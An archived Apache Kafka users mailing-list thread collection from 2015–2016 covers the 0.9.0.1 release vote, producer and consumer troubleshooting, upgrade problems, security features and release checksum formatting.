> > On Thu, Feb 11, 2016 at 6:55 PM, Jun Rao <j...@confluent.io> wrote:
> >
> > > This is the first candidate for release of Apache Kafka 0.9.0.1. This a
> > > bug fix release that fixes 70 issues.
> > >
> > > Release Notes for the 0.9.0.1 release
> > >
> >
> https://home.apache.org/~junrao/kafka-0.9.0.1-candidate1/RELEASE_NOTES.html
> > >
> > > *** Please download, test and vote by Tuesday, Feb. 16, 7pm PT
> > >
> > > Kafka's KEYS file containing PGP keys we use to sign the release:
> > > http://kafka.apache.org/KEYS in addition to the md5, sha1
> > > and sha2 (SHA256) checksum.
> > >
> > > * Release artifacts to be voted upon (source and binary):
> > > https://home.apache.org/~junrao/kafka-0.9.0.1-candidate1/
> > >
> > > * Maven artifacts to be voted upon prior to release:
> > > https://repository.apache.org/content/groups/staging/org/apache/kafka/
> > >
> > > * scala-doc
> > > https://home.apache.org/~junrao/kafka-0.9.0.1-candidate1/scaladoc/
> > >
> > > * java-doc
> > > https://home.apache.org/~junrao/kafka-0.9.0.1-candidate1/javadoc/
> > >
> > > * The tag to be voted upon (off the 0.9.0 branch) is the 0.9.0.1 tag
> > >
> > >
> >
> https://git-wip-us.apache.org/repos/asf?p=kafka.git;a=tag;h=2c17685a45efe665bf5f24c0296cb8f9e1157e89
> > >
> > > * Documentation
> > > http://kafka.apache.org/090/documentation.html
> > >
> > > Thanks,
> > >
> > > Jun
> > >
> > >
> >
>
>
>
> --
> *Christian Posta*
> twitter: @christianposta
> http://www.christianposta.com/blog
> http://fabric8.io
>

Re: 0.9.0.1 RC1

2016-02-16 Thread Jun Rao

Thanks everyone for voting. The results are:

+1 binding = 4 votes (Ewen Cheslack-Postava, Neha Narkhede, Joel Koshy and Jun
Rao)
+1 non-binding = 3 votes
-1 = 0 votes
0 = 0 votes

The vote passes.

I will release artifacts to maven central, update the dist svn and download
site. Will send out an announce after that.

Thanks,

Jun

On Thu, Feb 11, 2016 at 6:55 PM, Jun Rao <j...@confluent.io> wrote:

> This is the first candidate for release of Apache Kafka 0.9.0.1. This a
> bug fix release that fixes 70 issues.
>
> Release Notes for the 0.9.0.1 release
> https://home.apache.org/~junrao/kafka-0.9.0.1-candidate1/RELEASE_NOTES.html
>
> *** Please download, test and vote by Tuesday, Feb. 16, 7pm PT
>
> Kafka's KEYS file containing PGP keys we use to sign the release:
> http://kafka.apache.org/KEYS in addition to the md5, sha1
> and sha2 (SHA256) checksum.
>
> * Release artifacts to be voted upon (source and binary):
> https://home.apache.org/~junrao/kafka-0.9.0.1-candidate1/
>
> * Maven artifacts to be voted upon prior to release:
> https://repository.apache.org/content/groups/staging/org/apache/kafka/
>
> * scala-doc
> https://home.apache.org/~junrao/kafka-0.9.0.1-candidate1/scaladoc/
>
> * java-doc
> https://home.apache.org/~junrao/kafka-0.9.0.1-candidate1/javadoc/
>
> * The tag to be voted upon (off the 0.9.0 branch) is the 0.9.0.1 tag
>
> https://git-wip-us.apache.org/repos/asf?p=kafka.git;a=tag;h=2c17685a45efe665bf5f24c0296cb8f9e1157e89
>
> * Documentation
> http://kafka.apache.org/090/documentation.html
>
> Thanks,
>
> Jun
>
>

Re: 0.9.0.1 RC1

2016-02-16 Thread Jun Rao

Since the unit test failures are transient. +1 from myself.

Thanks,

Jun

On Thu, Feb 11, 2016 at 6:55 PM, Jun Rao <j...@confluent.io> wrote:

> This is the first candidate for release of Apache Kafka 0.9.0.1. This a
> bug fix release that fixes 70 issues.
>
> Release Notes for the 0.9.0.1 release
> https://home.apache.org/~junrao/kafka-0.9.0.1-candidate1/RELEASE_NOTES.html
>
> *** Please download, test and vote by Tuesday, Feb. 16, 7pm PT
>
> Kafka's KEYS file containing PGP keys we use to sign the release:
> http://kafka.apache.org/KEYS in addition to the md5, sha1
> and sha2 (SHA256) checksum.
>
> * Release artifacts to be voted upon (source and binary):
> https://home.apache.org/~junrao/kafka-0.9.0.1-candidate1/
>
> * Maven artifacts to be voted upon prior to release:
> https://repository.apache.org/content/groups/staging/org/apache/kafka/
>
> * scala-doc
> https://home.apache.org/~junrao/kafka-0.9.0.1-candidate1/scaladoc/
>
> * java-doc
> https://home.apache.org/~junrao/kafka-0.9.0.1-candidate1/javadoc/
>
> * The tag to be voted upon (off the 0.9.0 branch) is the 0.9.0.1 tag
>
> https://git-wip-us.apache.org/repos/asf?p=kafka.git;a=tag;h=2c17685a45efe665bf5f24c0296cb8f9e1157e89
>
> * Documentation
> http://kafka.apache.org/090/documentation.html
>
> Thanks,
>
> Jun
>
>

0.9.0.1 RC1

2016-02-11 Thread Jun Rao

This is the first candidate for release of Apache Kafka 0.9.0.1. This a bug
fix release that fixes 70 issues.

Release Notes for the 0.9.0.1 release
https://home.apache.org/~junrao/kafka-0.9.0.1-candidate1/RELEASE_NOTES.html

*** Please download, test and vote by Tuesday, Feb. 16, 7pm PT

Kafka's KEYS file containing PGP keys we use to sign the release:
http://kafka.apache.org/KEYS in addition to the md5, sha1
and sha2 (SHA256) checksum.

* Release artifacts to be voted upon (source and binary):
https://home.apache.org/~junrao/kafka-0.9.0.1-candidate1/

* Maven artifacts to be voted upon prior to release:
https://repository.apache.org/content/groups/staging/org/apache/kafka/

* scala-doc
https://home.apache.org/~junrao/kafka-0.9.0.1-candidate1/scaladoc/

* java-doc
https://home.apache.org/~junrao/kafka-0.9.0.1-candidate1/javadoc/

* The tag to be voted upon (off the 0.9.0 branch) is the 0.9.0.1 tag
https://git-wip-us.apache.org/repos/asf?p=kafka.git;a=tag;h=2c17685a45efe665bf5f24c0296cb8f9e1157e89

* Documentation
http://kafka.apache.org/090/documentation.html

Thanks,

Jun

Re: Caused by: org.apache.kafka.common.errors.TimeoutException: Failed to update metadata after 60000 ms.

2016-02-08 Thread Jun Rao

It seems that you put in the wrong port in the following statement. Kafka's
default port is 9092. 2181 is for Zookeeper.
   props.put("bootstrap.servers", "localhost:2181");

Thanks,

Jun

On Mon, Feb 8, 2016 at 4:06 AM, Bhargav Maddikera <
bhargav.maddik...@altimetrik.com> wrote:

> Hi,
>
> I try executing the code
>
>Properties props = new Properties();
>
>props.put("bootstrap.servers", "localhost:2181");
>   props.put("metadata.broker.list","localhost:9092");
>   props.put("request.required.acks", "1");
>   props.put("retries", 4);
> //props.put("batch.size", 16384);
> //props.put("linger.ms", 1);
> //props.put("buffer.memory", 33554432);
>   props.put("key.serializer",
> "org.apache.kafka.common.serialization.StringSerializer");
>   props.put("value.serializer",
> "org.apache.kafka.common.serialization.StringSerializer");
>
>   Producer producer = new KafkaProducer(props);
>   int maxMessages = 1000;
>
>   int count = 0;
>   while(count < maxMessages) {
> producer.send(new ProducerRecord String>("test",  "message --- #"+count++)).get();
> System.out.println("Message send.."+count);
>   }
>   producer.close();
>
>
>
> but I get Caused by: org.apache.kafka.common.errors.TimeoutException:
> Failed to update metadata after 6 ms.
>
>
> But when I  do,
>
> //Properties properties = new Properties();
> // properties.put("metadata.broker.list","localhost:9092");
> //
>  properties.put("serializer.class","kafka.serializer.StringEncoder");
> // properties.put("partitioner.class", "SimplePartitioner");
> // properties.put("request.required.acks", "1");
> // ProducerConfig producerConfig = new
> ProducerConfig(properties);
> // kafka.javaapi.producer.Producer producer =
> new kafka.javaapi.producer.Producer(producerConfig);
> // SimpleDateFormat sdf = new SimpleDateFormat();
> // KeyedMessage message =new KeyedMessage("test","1","After
> Restart210");
> // System.out.println(message.key());
> // producer.send(message);
> // producer.close();
> // System.out.println("done");
>
> It works fine.
>
> Regards.
> Bhargav.
>

Kafka 0.9.0.1 plan

2016-02-05 Thread Jun Rao

Hi, Everyone,

We have fixed a few critical bugs since 0.9.0.0 was released and are still
investigating a few more issues. The current list of issues tracked for
0.9.0.1 can be found below. Among them, only KAFKA-3159 seems to be
critical.

https://issues.apache.org/jira/issues/?jql=project%20%3D%20KAFKA%20AND%20status%20in%20(Open%2C%20%22In%20Progress%22%2C%20Reopened%2C%20%22Patch%20Available%22)%20AND%20fixVersion%20%3D%200.9.0.1

Once all critical issues are resolved, we will start the release process of
0.9.0.1. Our current plan is to do that next week.

Thanks,

Jun

Re: Stuck consumer with new consumer API in 0.9

2016-01-26 Thread Jun Rao

Rajiv,

We haven't released 0.9.0.1 yet. To try the fix, you can build a new client
jar off the 0.9.0 branch.

Thanks,

Jun

On Mon, Jan 25, 2016 at 12:03 PM, Rajiv Kurian  wrote:

> Thanks Jason. We are using an affected client I guess.
>
> Is there a 0.9.0 client available on maven? My search at
> http://mvnrepository.com/artifact/org.apache.kafka/kafka_2.10 only shows
> the 0.9.0.0 client which seems to have this issue.
>
>
> Thanks,
> Rajiv
>
> On Mon, Jan 25, 2016 at 11:56 AM, Jason Gustafson 
> wrote:
>
> > Hey Rajiv, the bug was on the client. Here's a link to the JIRA:
> > https://issues.apache.org/jira/browse/KAFKA-2978.
> >
> > -Jason
> >
> > On Mon, Jan 25, 2016 at 11:42 AM, Rajiv Kurian 
> wrote:
> >
> > > Hi Jason,
> > >
> > > Was this a server bug or a client bug?
> > >
> > > Thanks,
> > > Rajiv
> > >
> > > On Mon, Jan 25, 2016 at 11:23 AM, Jason Gustafson 
> > > wrote:
> > >
> > > > Apologies for the late arrival to this thread. There was a bug in the
> > > > 0.9.0.0 release of Kafka which could cause the consumer to stop
> > fetching
> > > > from a partition after a rebalance. If you're seeing this, please
> > > checkout
> > > > the 0.9.0 branch of Kafka and see if you can reproduce this problem.
> If
> > > you
> > > > can, then it would be really helpful if you file a JIRA with the
> steps
> > to
> > > > reproduce.
> > > >
> > > > From Han's initial example, it kind of looks like the problem might
> be
> > in
> > > > the usage. The consumer lag as shown by the kafka-consumer-groups
> > script
> > > > relies on the last committed position to determine lag. To update
> > > progress,
> > > > you need to commit offsets regularly. In the gist, offsets are only
> > > > committed on shutdown or when a rebalance occurs. When the group is
> > > stable,
> > > > no progress will be seen because there are no commits to update the
> > > > position.
> > > >
> > > > Thanks,
> > > > Jason
> > > >
> > > > On Mon, Jan 25, 2016 at 9:09 AM, Ismael Juma 
> > wrote:
> > > >
> > > > > Thanks!
> > > > >
> > > > > Ismael
> > > > >
> > > > > On Mon, Jan 25, 2016 at 4:03 PM, Han JU 
> > > wrote:
> > > > >
> > > > > > Issue created: https://issues.apache.org/jira/browse/KAFKA-3146
> > > > > >
> > > > > > 2016-01-25 16:07 GMT+01:00 Han JU :
> > > > > >
> > > > > > > Hi Bruno,
> > > > > > >
> > > > > > > Can you tell me a little bit more about that? A seek() in the
> > > > > > > `onPartitionAssigned`?
> > > > > > >
> > > > > > > Thanks.
> > > > > > >
> > > > > > > 2016-01-25 10:51 GMT+01:00 Han JU :
> > > > > > >
> > > > > > >> Ok I'll create a JIRA issue on this.
> > > > > > >>
> > > > > > >> Thanks!
> > > > > > >>
> > > > > > >> 2016-01-23 21:47 GMT+01:00 Bruno Rassaerts <
> > > > > bruno.rassae...@novazone.be
> > > > > > >:
> > > > > > >>
> > > > > > >>> +1 here
> > > > > > >>>
> > > > > > >>> As a workaround we seek to the current offset which resets
> the
> > > > > current
> > > > > > >>> clients internal states and everything continues.
> > > > > > >>>
> > > > > > >>> Regards,
> > > > > > >>> Bruno Rassaerts | Freelance Java Developer
> > > > > > >>>
> > > > > > >>> Novazone, Edingsesteenweg 302, B-1755 Gooik, Belgium
> > > > > > >>> T: +32(0)54/26.02.03 - M:+32(0)477/39.01.15
> > > > > > >>> bruno.rassae...@novazone.be -www.novazone.be
> > > > > > >>>
> > > > > > >>> > On 23 Jan 2016, at 17:52, Ismael Juma 
> > > wrote:
> > > > > > >>> >
> > > > > > >>> > Hi,
> > > > > > >>> >
> > > > > > >>> > Can you please file an issue in JIRA so that we make sure
> > this
> > > is
> > > > > > >>> > investigated?
> > > > > > >>> >
> > > > > > >>> > Ismael
> > > > > > >>> >
> > > > > > >>> >> On Fri, Jan 22, 2016 at 3:13 PM, Han JU <
> > > ju.han.fe...@gmail.com
> > > > >
> > > > > > >>> wrote:
> > > > > > >>> >>
> > > > > > >>> >> Hi,
> > > > > > >>> >>
> > > > > > >>> >> I'm prototyping with the new consumer API of kafka 0.9 and
> > I'm
> > > > > > >>> particularly
> > > > > > >>> >> interested in the `ConsumerRebalanceListener`.
> > > > > > >>> >>
> > > > > > >>> >> My test setup is like the following:
> > > > > > >>> >>  - 5M messages pre-loaded in one node kafka 0.9
> > > > > > >>> >>  - 12 partitions, auto offset commit set to false
> > > > > > >>> >>  - in `onPartitionsRevoked`, commit offset and flush the
> > local
> > > > > state
> > > > > > >>> >>
> > > > > > >>> >> The test run is like the following:
> > > > > > >>> >>  - launch one process with 2 consumers and let it consume
> > for
> > > a
> > > > > > while
> > > > > > >>> >>  - launch another process with 2 consumers, this triggers
> a
> > > > > > >>> rebalancing,
> > > > > > >>> >> and let these 2 processes run until messages are all
> > consumed
> > > > > > >>> >>
> > > > > > >>> >> The code is here:
> > > > > > https://gist.github.com/darkjh/fe1e5a5387bf13b4d4dd
> > > > >

Re: Security in Kafka

2016-01-06 Thread Jun Rao

Mohit,

In 0.9, Kafka supports Kerberos. So, you can authenticate with any
directory service that supports Kerberos (e.g., Active Directory). Our
default authorization is based on individual users, not on groups though.

You can find more a bit more info on security in the following links.

http://kafka.apache.org/090/documentation.html#security_sasl
http://docs.confluent.io/2.0.0/kafka/sasl.html

Thanks,

Jun

On Wed, Jan 6, 2016 at 9:30 AM, Mohit Anchlia 
wrote:

> In 0.9 release it's not clear if Security features of LDAP authentication
> and authorization are available? If authN and authZ are available can
> somebody point me to relevant documentation that shows how to configure
> Kafka to enable authN and authZ?
>

Re: MD5 checksum on release

2015-12-30 Thread Jun Rao

Xavier,

We also generate sha1 and sha2. Do we have to use different tools to
generate those too?

Thanks,

Jun

On Wed, Dec 30, 2015 at 2:29 PM, Xavier Stevens <xav...@simple.com> wrote:

> Hey Jun,
>
> I was expecting that you just used md5sum (GNU version).
>
> The nice part of using it is that when scripting a check it has a -c
> option:
>
> md5sum -c kafka_2.11-0.9.0.0.tgz.md5
>
> The difficult bit with what is currently there, is that it has a whole
> bunch of newlines and spacing in it. So I had to do some janky shell
> scripting to parse out what I wanted. Here's the basic gist of it if anyone
> finds this useful:
>
> SOURCE_CHECKSUM=`md5sum kafka_2.11-0.9.0.0.tgz | awk '{print $1}'`
> TARGET_CHECKSUM=`cat kafka_2.11-0.9.0.0.tgz.md5 | tr -d '\n' | awk '{ line
> = sprintf("%s", $0); gsub(/[[:space:]]/, "", line); split(line, parts,
> ":"); print tolower(parts[2]) }'`
> if [ "$SOURCE_CHECKSUM" == "$TARGET_CHECKSUM" ]
> ...
> fi
>
> Not a huge deal I just think it would make it easier for folks to use the
> former rather than GPG.
>
> Cheers,
>
>
> Xavier
>
>
> On Wed, Dec 30, 2015 at 2:00 PM, Jun Rao <j...@confluent.io> wrote:
>
> > Xavier,
> >
> > The md5 checksum is generated by running "gpg --print-md MD5". Is there a
> > command that generates the output that you wanted?
> >
> > Thanks,
> >
> > Jun
> >
> > On Tue, Dec 29, 2015 at 5:13 PM, Xavier Stevens <xav...@simple.com>
> wrote:
> >
> > > The current md5 checksums of the release downloads all seem to be
> > returning
> > > in an atypical format. Anyone know what's going on there?
> > >
> > > Example:
> > >
> > >
> >
> https://dist.apache.org/repos/dist/release/kafka/0.9.0.0/kafka_2.11-0.9.0.0.tgz.md5
> > >
> > > I see:
> > >
> > > kafka_2.11-0.9.0.0.tgz: 08 4F B8
> > > 0C DC 8C
> > > 72 DC  75
> > > BC 35 19
> > > A5 D2 CC
> > > 5C
> > >
> > > I would expect to see something more like:
> > >
> > > 084fb80cdc8c72dc75bc3519a5d2cc5c kafka_2.11-0.9.0.0.tgz
> > >
> >
>

Re: MD5 checksum on release

2015-12-30 Thread Jun Rao

Xavier,

The md5 checksum is generated by running "gpg --print-md MD5". Is there a
command that generates the output that you wanted?

Thanks,

Jun

On Tue, Dec 29, 2015 at 5:13 PM, Xavier Stevens  wrote:

> The current md5 checksums of the release downloads all seem to be returning
> in an atypical format. Anyone know what's going on there?
>
> Example:
>
> https://dist.apache.org/repos/dist/release/kafka/0.9.0.0/kafka_2.11-0.9.0.0.tgz.md5
>
> I see:
>
> kafka_2.11-0.9.0.0.tgz: 08 4F B8
> 0C DC 8C
> 72 DC  75
> BC 35 19
> A5 D2 CC
> 5C
>
> I would expect to see something more like:
>
> 084fb80cdc8c72dc75bc3519a5d2cc5c kafka_2.11-0.9.0.0.tgz
>

Re: Why does'nt kafka replicate data automatically if a broker goes down

2015-12-28 Thread Jun Rao

Manju,

You understanding is correct. Just added the following FAQ.

https://cwiki.apache.org/confluence/display/KAFKA/FAQ#FAQ-Howtoreplaceafailedbroker
?

Thanks,

Jun

On Sun, Dec 27, 2015 at 11:30 PM, Manjunath Shivanna 
wrote:

> Hi,
>
> Correct me if I am wrong. I believe kafka does not replicate the data of a
> lost replica if a broker hosting the replica goes down.
>
> What should be done to make to the replication factor reach the desired
> level if the broker hosting the replica cannot be brought back?
>
> Regards,
> Manju
>

Re: Fallout from upgrading to kafka 0.9 from 0.8.2.3

2015-12-17 Thread Jun Rao

Rajiv,

Thanks for reporting this.

1. How did you verify that 3 of the topics are corrupted? Did you use
DumpLogSegments tool? Also, is there a simple way to reproduce the
corruption?
2. As Lance mentioned, if you are using snappy, make sure that you include
the right snappy jar (1.1.1.7).
3. For the CPU issue, could you do a bit profiling to see which thread is
busy and where it's spending time?

Jun


On Tue, Dec 15, 2015 at 12:52 PM, Rajiv Kurian  wrote:

> We had to revert to 0.8.3 because three of our topics seem to have gotten
> corrupted during the upgrade. As soon as we did the upgrade producers to
> the three topics I mentioned stopped being able to do writes. The clients
> complained (occasionally) about leader not found exceptions. We restarted
> our clients and brokers but that didn't seem to help. Actually even after
> reverting to 0.8.3 these three topics were broken. To fix it we had to stop
> all clients, delete the topics, create them again and then restart the
> clients.
>
> I realize this is not a lot of info. I couldn't wait to get more debug info
> because the cluster was actually being used. Has any one run into something
> like this? Are there any known issues with old consumers/producers. The
> topics that got busted had clients writing to them using the old Java
> wrapper over the Scala producer.
>
> Here are the steps I took to upgrade.
>
> For each broker:
>
> 1. Stop the broker.
> 2. Restart with the 0.9 broker running with
> inter.broker.protocol.version=0.8.2.X
> 3. Wait for under replicated partitions to go down to 0.
> 4. Go to step 1.
> Once all the brokers were running the 0.9 code with
> inter.broker.protocol.version=0.8.2.X we restarted them one by one with
> inter.broker.protocol.version=0.9.0.0
>
> When reverting I did the following.
>
> For each broker.
>
> 1. Stop the broker.
> 2. Restart with the 0.9 broker running with
> inter.broker.protocol.version=0.8.2.X
> 3. Wait for under replicated partitions to go down to 0.
> 4. Go to step 1.
>
> Once all the brokers were running 0.9 code with
> inter.broker.protocol.version=0.8.2.X  I restarted them one by one with the
> 0.8.2.3 broker code. This however like I mentioned did not fix the three
> broken topics.
>
>
> On Mon, Dec 14, 2015 at 3:13 PM, Rajiv Kurian  wrote:
>
> > Now that it has been a bit longer, the spikes I was seeing are gone but
> > the CPU and network in/out on the three brokers that were showing the
> > spikes are still much higher than before the upgrade. Their CPUs have
> > increased from around 1-2% to 12-20%. The network in on the same brokers
> > has gone up from under 2 Mb/sec to 19-33 Mb/sec. The network out has gone
> > up from under 2 Mb/sec to 29-42 Mb/sec. I don't see a corresponding
> > increase in kafka messages in per second or kafka bytes in per second JMX
> > metrics.
> >
> > Thanks,
> > Rajiv
> >
>

Re: Fallout from upgrading to kafka 0.9 from 0.8.2.3

2015-12-17 Thread Jun Rao

Are you using the new java producer?

Thanks,

Jun

On Thu, Dec 17, 2015 at 9:58 AM, Rajiv Kurian <ra...@signalfx.com> wrote:

> Hi Jun,
> Answers inline:
>
> On Thu, Dec 17, 2015 at 9:41 AM, Jun Rao <j...@confluent.io> wrote:
>
> > Rajiv,
> >
> > Thanks for reporting this.
> >
> > 1. How did you verify that 3 of the topics are corrupted? Did you use
> > DumpLogSegments tool? Also, is there a simple way to reproduce the
> > corruption?
> >
> No I did not. The only reason I had to believe that was no writers could
> write to the topic. I have actually no idea what the problem was. I saw
> very frequent (much more than usual) messages of the form:
> INFO  [kafka-request-handler-2] [kafka.server.KafkaApis
>   ]: [KafkaApi-6] Close connection due to error handling produce
> request with correlation id 294218 from client id  with ack=0
> and also message of the form:
> INFO  [kafka-network-thread-9092-0] [kafka.network.Processor
>   ]: Closing socket connection to /some ip
> The cluster was actually a critical one so I had no recourse but to revert
> the change (which like noted didn't fix things). I didn't have enough time
> to debug further. The only way I could fix it with my limited Kafka
> knowledge was (after reverting) deleting the topic and recreating it.
> I had updated a low priority cluster before that worked just fine. That
> gave me the confidence to upgrade this higher priority cluster which did
> NOT work out. So the only way for me to try to reproduce it is to try this
> on our larger clusters again. But it is critical that we don't mess up this
> high priority cluster so I am afraid to try again.
>
> > 2. As Lance mentioned, if you are using snappy, make sure that you
> include
> > the right snappy jar (1.1.1.7).
> >
> Wonder why I don't see Lance's email in this thread. Either way we are not
> using compression of any kind on this topic.
>
> > 3. For the CPU issue, could you do a bit profiling to see which thread is
> > busy and where it's spending time?
> >
> Since I had to revert I didn't have the time to profile. Intuitively it
> would seem like the high number of client disconnects/errors and the
> increased network usage probably has something to do with the high CPU
> (total guess). Again our other (lower traffic) cluster that was upgraded
> was totally fine so it doesn't seem like it happens all the time.
>
> >
> > Jun
> >
> >
> > On Tue, Dec 15, 2015 at 12:52 PM, Rajiv Kurian <ra...@signalfx.com>
> wrote:
> >
> > > We had to revert to 0.8.3 because three of our topics seem to have
> gotten
> > > corrupted during the upgrade. As soon as we did the upgrade producers
> to
> > > the three topics I mentioned stopped being able to do writes. The
> clients
> > > complained (occasionally) about leader not found exceptions. We
> restarted
> > > our clients and brokers but that didn't seem to help. Actually even
> after
> > > reverting to 0.8.3 these three topics were broken. To fix it we had to
> > stop
> > > all clients, delete the topics, create them again and then restart the
> > > clients.
> > >
> > > I realize this is not a lot of info. I couldn't wait to get more debug
> > info
> > > because the cluster was actually being used. Has any one run into
> > something
> > > like this? Are there any known issues with old consumers/producers. The
> > > topics that got busted had clients writing to them using the old Java
> > > wrapper over the Scala producer.
> > >
> > > Here are the steps I took to upgrade.
> > >
> > > For each broker:
> > >
> > > 1. Stop the broker.
> > > 2. Restart with the 0.9 broker running with
> > > inter.broker.protocol.version=0.8.2.X
> > > 3. Wait for under replicated partitions to go down to 0.
> > > 4. Go to step 1.
> > > Once all the brokers were running the 0.9 code with
> > > inter.broker.protocol.version=0.8.2.X we restarted them one by one with
> > > inter.broker.protocol.version=0.9.0.0
> > >
> > > When reverting I did the following.
> > >
> > > For each broker.
> > >
> > > 1. Stop the broker.
> > > 2. Restart with the 0.9 broker running with
> > > inter.broker.protocol.version=0.8.2.X
> > > 3. Wait for under replicated partitions to go down to 0.
> > > 4. Go to step 1.
> > >
> > > Once all the brokers were running 0.9 code with
> > > inter.broker.protocol.version=0.8.2.X  I restarted them one by one with

Re: Fallout from upgrading to kafka 0.9 from 0.8.2.3

2015-12-17 Thread Jun Rao

Hmm, anything special with those 3 topics? Also, the broker log shows that
the producer uses ack=0, which means the producer shouldn't get errors like
leader not found. Could you clarify on the ack used by the producer?

Thanks,

Jun

On Thu, Dec 17, 2015 at 12:41 PM, Rajiv Kurian <ra...@signalfx.com> wrote:

> The topic which stopped working had clients that were only using the old
> Java producer that is a wrapper over the Scala producer. Again it seemed to
> work perfectly in another of our realms where we have the same topics, same
> producers/consumers etc but with less traffic.
>
> On Thu, Dec 17, 2015 at 12:23 PM, Jun Rao <j...@confluent.io> wrote:
>
> > Are you using the new java producer?
> >
> > Thanks,
> >
> > Jun
> >
> > On Thu, Dec 17, 2015 at 9:58 AM, Rajiv Kurian <ra...@signalfx.com>
> wrote:
> >
> > > Hi Jun,
> > > Answers inline:
> > >
> > > On Thu, Dec 17, 2015 at 9:41 AM, Jun Rao <j...@confluent.io> wrote:
> > >
> > > > Rajiv,
> > > >
> > > > Thanks for reporting this.
> > > >
> > > > 1. How did you verify that 3 of the topics are corrupted? Did you use
> > > > DumpLogSegments tool? Also, is there a simple way to reproduce the
> > > > corruption?
> > > >
> > > No I did not. The only reason I had to believe that was no writers
> could
> > > write to the topic. I have actually no idea what the problem was. I saw
> > > very frequent (much more than usual) messages of the form:
> > > INFO  [kafka-request-handler-2] [kafka.server.KafkaApis
> > >   ]: [KafkaApi-6] Close connection due to error handling produce
> > > request with correlation id 294218 from client id  with ack=0
> > > and also message of the form:
> > > INFO  [kafka-network-thread-9092-0] [kafka.network.Processor
> > >   ]: Closing socket connection to /some ip
> > > The cluster was actually a critical one so I had no recourse but to
> > revert
> > > the change (which like noted didn't fix things). I didn't have enough
> > time
> > > to debug further. The only way I could fix it with my limited Kafka
> > > knowledge was (after reverting) deleting the topic and recreating it.
> > > I had updated a low priority cluster before that worked just fine. That
> > > gave me the confidence to upgrade this higher priority cluster which
> did
> > > NOT work out. So the only way for me to try to reproduce it is to try
> > this
> > > on our larger clusters again. But it is critical that we don't mess up
> > this
> > > high priority cluster so I am afraid to try again.
> > >
> > > > 2. As Lance mentioned, if you are using snappy, make sure that you
> > > include
> > > > the right snappy jar (1.1.1.7).
> > > >
> > > Wonder why I don't see Lance's email in this thread. Either way we are
> > not
> > > using compression of any kind on this topic.
> > >
> > > > 3. For the CPU issue, could you do a bit profiling to see which
> thread
> > is
> > > > busy and where it's spending time?
> > > >
> > > Since I had to revert I didn't have the time to profile. Intuitively it
> > > would seem like the high number of client disconnects/errors and the
> > > increased network usage probably has something to do with the high CPU
> > > (total guess). Again our other (lower traffic) cluster that was
> upgraded
> > > was totally fine so it doesn't seem like it happens all the time.
> > >
> > > >
> > > > Jun
> > > >
> > > >
> > > > On Tue, Dec 15, 2015 at 12:52 PM, Rajiv Kurian <ra...@signalfx.com>
> > > wrote:
> > > >
> > > > > We had to revert to 0.8.3 because three of our topics seem to have
> > > gotten
> > > > > corrupted during the upgrade. As soon as we did the upgrade
> producers
> > > to
> > > > > the three topics I mentioned stopped being able to do writes. The
> > > clients
> > > > > complained (occasionally) about leader not found exceptions. We
> > > restarted
> > > > > our clients and brokers but that didn't seem to help. Actually even
> > > after
> > > > > reverting to 0.8.3 these three topics were broken. To fix it we had
> > to
> > > > stop
> > > > > all clients, delete the topics, create them again and then restart
> > the
> > > >

Re: Fallout from upgrading to kafka 0.9 from 0.8.2.3

2015-12-17 Thread Jun Rao

Yes, the new java producer is available in 0.8.2.x and we recommend people
use that.

Also, when those producers had the issue, were there any other things weird
in the broker (e.g., broker's ZK session expires)?

Thanks,

Jun

On Thu, Dec 17, 2015 at 2:37 PM, Rajiv Kurian <ra...@signalfx.com> wrote:

> I can't think of anything special about the topics besides the clients
> being very old (Java wrappers over Scala).
>
> I do think it was using ack=0. But my guess is that the logging was done by
> the Kafka producer thread. My application itself was not getting exceptions
> from Kafka.
>
> On Thu, Dec 17, 2015 at 2:31 PM, Jun Rao <j...@confluent.io> wrote:
>
> > Hmm, anything special with those 3 topics? Also, the broker log shows
> that
> > the producer uses ack=0, which means the producer shouldn't get errors
> like
> > leader not found. Could you clarify on the ack used by the producer?
> >
> > Thanks,
> >
> > Jun
> >
> > On Thu, Dec 17, 2015 at 12:41 PM, Rajiv Kurian <ra...@signalfx.com>
> wrote:
> >
> > > The topic which stopped working had clients that were only using the
> old
> > > Java producer that is a wrapper over the Scala producer. Again it
> seemed
> > to
> > > work perfectly in another of our realms where we have the same topics,
> > same
> > > producers/consumers etc but with less traffic.
> > >
> > > On Thu, Dec 17, 2015 at 12:23 PM, Jun Rao <j...@confluent.io> wrote:
> > >
> > > > Are you using the new java producer?
> > > >
> > > > Thanks,
> > > >
> > > > Jun
> > > >
> > > > On Thu, Dec 17, 2015 at 9:58 AM, Rajiv Kurian <ra...@signalfx.com>
> > > wrote:
> > > >
> > > > > Hi Jun,
> > > > > Answers inline:
> > > > >
> > > > > On Thu, Dec 17, 2015 at 9:41 AM, Jun Rao <j...@confluent.io> wrote:
> > > > >
> > > > > > Rajiv,
> > > > > >
> > > > > > Thanks for reporting this.
> > > > > >
> > > > > > 1. How did you verify that 3 of the topics are corrupted? Did you
> > use
> > > > > > DumpLogSegments tool? Also, is there a simple way to reproduce
> the
> > > > > > corruption?
> > > > > >
> > > > > No I did not. The only reason I had to believe that was no writers
> > > could
> > > > > write to the topic. I have actually no idea what the problem was. I
> > saw
> > > > > very frequent (much more than usual) messages of the form:
> > > > > INFO  [kafka-request-handler-2] [kafka.server.KafkaApis
> > > > >   ]: [KafkaApi-6] Close connection due to error handling
> produce
> > > > > request with correlation id 294218 from client id  with ack=0
> > > > > and also message of the form:
> > > > > INFO  [kafka-network-thread-9092-0]
> [kafka.network.Processor
> > > > >   ]: Closing socket connection to /some ip
> > > > > The cluster was actually a critical one so I had no recourse but to
> > > > revert
> > > > > the change (which like noted didn't fix things). I didn't have
> enough
> > > > time
> > > > > to debug further. The only way I could fix it with my limited Kafka
> > > > > knowledge was (after reverting) deleting the topic and recreating
> it.
> > > > > I had updated a low priority cluster before that worked just fine.
> > That
> > > > > gave me the confidence to upgrade this higher priority cluster
> which
> > > did
> > > > > NOT work out. So the only way for me to try to reproduce it is to
> try
> > > > this
> > > > > on our larger clusters again. But it is critical that we don't mess
> > up
> > > > this
> > > > > high priority cluster so I am afraid to try again.
> > > > >
> > > > > > 2. As Lance mentioned, if you are using snappy, make sure that
> you
> > > > > include
> > > > > > the right snappy jar (1.1.1.7).
> > > > > >
> > > > > Wonder why I don't see Lance's email in this thread. Either way we
> > are
> > > > not
> > > > > using compression of any kind on this topic.
> > > > >
> > > > > > 3. For the CPU issue, could you do a bit profiling to see which
> > > thread
> > >

Re: CSVMetricsReporter name conflict

2015-12-14 Thread Jun Rao

Andrew,

Yes, in 0.8.2.x, we cleaned up the metric name to put meaning attributes in
tags, instead of in the name. This makes it easier for monitoring
